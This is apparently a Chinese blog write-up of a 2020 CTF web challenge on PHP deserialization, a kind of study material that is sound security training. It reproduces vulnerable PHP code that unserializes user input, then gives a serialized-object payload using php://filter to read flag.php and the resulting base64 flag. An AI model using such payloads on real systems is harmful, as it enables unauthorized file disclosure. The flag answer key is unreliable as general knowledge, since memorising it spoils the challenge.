- 1JavaScript学习(基础)_课程 javascript基础
- 2Ubuntu22.04.01Desktop桌面版安装记录221109_hwclock: use the --verbose option to see the detai
- 3python怎样给对象赋值_python 对象/变量&赋值的几点思考
- 4如何升级到 Docker Compose v2_docker-compose 版本过低,请升级至v2+!
- 5python 数字人视频生成_python的数字人面部表情视频
- 6The authentication type 10 is not supported_the authentication type 10 is not supported. check
- 7分布式消息通知----Kafka集群部署_kafka分布式部署
- 8unity配置.asset文件_unity .asset
- 9使用QT实现点餐ui界面_qt点餐系统
- 10pyqt5界面的布局与资源文件的载入_pyqt5布局文件
[网鼎杯 2020 青龙组]AreUSerialz
赞
踩
题目:
给了一个代码审计部分:
- <?php
-
- include("flag.php");
-
- highlight_file(__FILE__);
-
- class FileHandler {
-
- protected $op;
- protected $filename;
- protected $content;
-
- function __construct() {
- $op = "1";
- $filename = "/tmp/tmpfile";
- $content = "Hello World!";
- $this->process();
- }
-
- public function process() {
- if($this->op == "1") {
- $this->write();
- } else if($this->op == "2") {
- $res = $this->read();
- $this->output($res);
- } else {
- $this->output("Bad Hacker!");
- }
- }
-
- private function write() {
- if(isset($this->filename) && isset($this->content)) {
- if(strlen((string)$this->content) > 100) {
- $this->output("Too long!");
- die();
- }
- $res = file_put_contents($this->filename, $this->content);
- if($res) $this->output("Successful!");
- else $this->output("Failed!");
- } else {
- $this->output("Failed!");
- }
- }
-
- private function read() {
- $res = "";
- if(isset($this->filename)) {
- $res = file_get_contents($this->filename);
- }
- return $res;
- }
-
- private function output($s) {
- echo "[Result]: <br>";
- echo $s;
- }
-
- function __destruct() {
- if($this->op === "2")
- $this->op = "1";
- $this->content = "";
- $this->process();
- }
-
- }
-
- function is_valid($s) {
- for($i = 0; $i < strlen($s); $i++)
- if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
- return false;
- return true;
- }
-
- if(isset($_GET{'str'})) {
-
- $str = (string)$_GET['str'];
- if(is_valid($str)) {
- $obj = unserialize($str);
- }
-
- }
首先这个题目给出的是AreUSerialz,所以一看就知道跟序列化有关的。
代码分析:
1.类之外的函数
本人喜欢先看类之外的函数,因为类太繁杂而且主要第一步运行的不就是类外函数吗?
这里可以看出我们传入了一个str参数,用url?str=进行传参
然后调用了is_valid函数,
is_valid函数说明了我们字符串str里面所有字符必须是ascill码中32到125之间的字符
有需要的大家就自己找吧ascii字符表
然后就会调用反序列化函数unseralize();
2.类及其类内函数
上面的construct会调用process函数,然后这些函数会按顺序执行,执行哪些参考op参数
相关知识点:
1.魔术方法;
php代码中的类,如果函数是以下划线_开头的,就是会自动调用的函数
如本题中的
这些都是会自动调用的,所以你就会知道为什么他只是调用了反序列化,但是为什么还能执行类里面的函数,因为自动调用了construct,然后construct里面调用了process函数
2.类的封装的序列化
protected/private类型的属性序列化后产生不可打印字符,public类型则不会。
所以本题里面有个is_valid(),如果你序列化时用的是protected,或者private的话,你生成的序列化会出现一些乱码,就是不可打印的字符串
3.PHP版本问题
PHP7.1+对类的属性类型不敏感。
所以可以把protected改为public
解题路线:
首先一看我们需要传入一个str的字符串,然后这些字符里面不能出现ascii码32到125之外的字符
然后我们自动调用了构造函数construct,因为构造函数的写法是_construct,所以生成的时候会自动调用
然后construct函数里面调用了process函数
这里会有三个分支,但是我们大胆猜测第二个才是我们要的,其实也能一个一个看,但是我懒得写了。我给出的理由是,第一它读,我猜他读的是文件地址,输出是输出我们所需要的文件,所以这部分是我们需要利用的
可以看到file_get_contents(),这不是很容易想到伪文件读取协议吗
然后我们将读取的文件输出出来
实际解题方式:
1.构造序列化
刚说了protected和private连个会产生不可打印字符,我们试一下,刚才逻辑下来我们已知我们op参数要为2,并且filename那里可以用伪文件读取协议
我这里不知道为什么没显示出来,但是确实会出现不可输出的符号
然后我们转用public
构造序列化的代码如下:
- <?php
- class FileHandler{
- public $op=2;
- public $filename="php://filter/read=convert.base64-encode/resource=flag.php";
- public $content;
- }
- $a=new FileHandler();
- $b=serialize($a);
- echo($b);
- ?>
-
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";s:7:"content";N;} 然后我们将序列化后的作为str的参数传进去就可以获得一串base64编码后的flag
2.传参
PD9waHAgJGZsYWc9J2ZsYWd7NDdjNjQ1MmUtNGUyMi00ODMzLTk0ZDUtYmYwNTI4ZmFiYzhmfSc7Cg==3.base64解码
然后就可以提交flag了
